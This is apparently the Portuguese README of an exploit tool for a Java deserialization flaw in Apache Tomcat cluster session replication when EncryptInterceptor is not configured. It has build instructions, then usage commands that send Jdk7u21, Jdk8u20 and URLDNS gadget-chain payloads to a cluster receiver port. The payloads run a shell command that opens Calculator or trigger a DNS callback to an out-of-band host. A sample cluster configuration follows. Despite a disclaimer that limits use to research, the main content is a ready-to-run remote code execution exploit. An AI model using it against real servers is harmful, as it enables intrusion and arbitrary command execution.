
Quando o Tomcat utiliza a função de sincronização de sessão integrada, uma configuração insegura (sem o uso do EncryptInterceptor) leva a uma vulnerabilidade de desserialização. Através de pacotes de dados cuidadosamente construídos, é possível atacar servidores que utilizam a função de sincronização de sessão integrada do Tomcat. PS: Esta não é a CVE-2020-9484; a 9484 é uma vulnerabilidade de persistência de sessão, esta é uma vulnerabilidade de sincronização de sessão em cluster!
Esta ferramenta é apenas para pesquisa de segurança e auto-inspeção interna. É proibido usá-la para lançar ataques ilegais. O usuário é responsável pelas consequências.
Isso é uma vulnerabilidade de desserialização que existe quando o Tomcat utiliza a funcionalidade de sincronização de sessão integrada com uma configuração insegura (sem usar o EncryptInterceptor). Através de pacotes cuidadosamente construídos, é possível atacar servidores que utilizam a funcionalidade de sincronização de sessão do Tomcat.
Primeiro, compile o pacote JAR:
mvn clean compile assembly:assembly
O pacote JAR gerado estará no diretório target.
Exemplo de uso:
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"
EncryptInterceptor configurado.(conf/server.xml):
<Server>
...
<Service>
...
<Engine>
...
<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
channelSendOptions="6">
<Manager className="org.apache.catalina.ha.session.BackupManager"
expireSessionsOnShutdown="false"
notifyListenersOnReplication="true"
mapSendOptions="6"/>
<Channel className="org.apache.catalina.tribes.group.GroupChannel">
<Membership className="org.apache.catalina.tribes.membership.McastService"
address="228.0.0.4"
port="45564"
frequency="500"
dropTime="3000"/>
<Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
address="123.123.123.123"
port="5000"
selectorTimeout="100"
maxThreads="6"/>
<Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
<Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
</Sender>
</Channel>
<Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
<Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
tempDir="/tmp/war-temp/"
deployDir="/tmp/war-deploy/"
watchDir="/tmp/war-listen/"
watchEnabled="false"/>
<ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
</Engine>
</Service>
</Server>